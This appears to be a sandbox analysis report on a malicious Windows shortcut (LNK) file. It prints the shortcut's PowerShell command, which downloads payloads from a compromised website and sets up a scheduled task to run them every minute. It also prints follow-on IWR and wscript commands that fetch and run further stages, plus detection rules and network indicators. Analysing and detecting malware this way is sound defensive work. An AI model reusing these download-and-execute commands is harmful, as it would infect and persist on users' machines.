$KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ProcessId: 6652, ProcessName: powershell.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-03T09:15:10.115267+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 46.254.34.201 | 443 | TCP

      AV Detection

      Source: yT6gJFN0SR.lnk; ReversingLabs: Detection: 45%
      Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.0% probability
      Source: yT6gJFN0SR.lnk; Joe Sandbox ML: detected
      Source: unknown; HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49699 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49702 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49783 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49913 version: TLS 1.2

      Software Vulnerabilities

      Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1; Host: www.italialife24.it; Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1; Host: www.italialife24.it
      Source: Joe Sandbox View; IP Address: 46.254.34.201
      Source: Joe Sandbox View; ASN Name: SERVERPLAN-ASIT
      Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 46.254.34.201:443
      Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: www.italialife24.it; Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: www.italialife24.it; Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: www.italialife24.it; Connection: Keep-Alive
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1; Host: www.italialife24.it; Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1; Host: www.italialife24.it
      Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: www.italialife24.it; Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: www.italialife24.it; Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: www.italialife24.it; Connection: Keep-Alive
      Source: global traffic; DNS traffic detected: DNS query: www.italialife24.it
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD67C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD6E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C47CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D004B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://italialife24.it
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD952000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC1E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852324000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860ACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D33A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D325E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEAE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEC19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AC031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022850A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CEA71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD67C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD6E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C47CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D004B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.italialife24.it
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AC031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022850A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CEA71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1355313472.00000207ACC62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.000002285167C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C434B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CF69C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 0000000C.00000002.1457580508.0000022868EE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micros
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD952000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC1E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852324000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860ACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D33A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D325E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEAE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEC19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD6C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022851D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C434B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CFDB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it
      Source: wscript.exe, 0000000F.00000002.1413160775.000001FB698A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-c
      Source: wscript.exe, wscript.exe, 00000018.00000002.2279989400.000001D168195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content
      Source: wscript.exe, 00000018.00000003.2276654785.000001D168012000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2279915971.000001D168012000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2276802574.000001D168012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/a
      Source: powershell.exe, 00000019.00000002.2317734095.000001E4CE380000.00000004.00000020.00020000.00000000.sdmp, epZTzlYAtsWrS0.js.0.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
      Source: powershell.exe, 0000000C.00000002.1457478884.0000022868D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1834579083.00000178DB210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2314205529.000001E4CCA05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
      Source: wscript.exe, 00000018.00000002.2279989400.000001D168195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/au
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1375410918.00000207C43DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AC262000.00000004.00000800.00020000.00000000.sdmp, yT6gJFN0SR.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
      Source: powershell.exe, 00000000.00000002.1354882040.00000207AA335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
      Source: wscript.exe, 0000001C.00000002.2338052164.000001F1B4090000.00000004.00000020.00020000.00000000.sdmp, NDU462JA8L5M.js.12.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
      Source: powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AC262000.00000004.00000800.00020000.00000000.sdmp, yT6gJFN0SR.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
      Source: powershell.exe, 00000000.00000002.1354882040.00000207AA335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
      Source: wscript.exe, 0000000F.00000002.1413160775.000001FB698A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000002.1746599548.000001B9565C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001C.00000002.2338001423.000001F1B24B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/untrippingv
      Source: wscript.exe, 0000001C.00000002.2338052164.000001F1B4090000.00000004.00000020.00020000.00000000.sdmp, NDU462JA8L5M.js.12.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49699 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49702 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.7:49913 version: TLS 1.2

      System Summary

Source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: yT6gJFN0SR.lnk | LNK file: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC7A208D
Source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.expl.evad.winLNK@28/13@1/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aspxuzhl.pkd.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: yT6gJFN0SR.lnk | ReversingLabs: Detection: 45%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
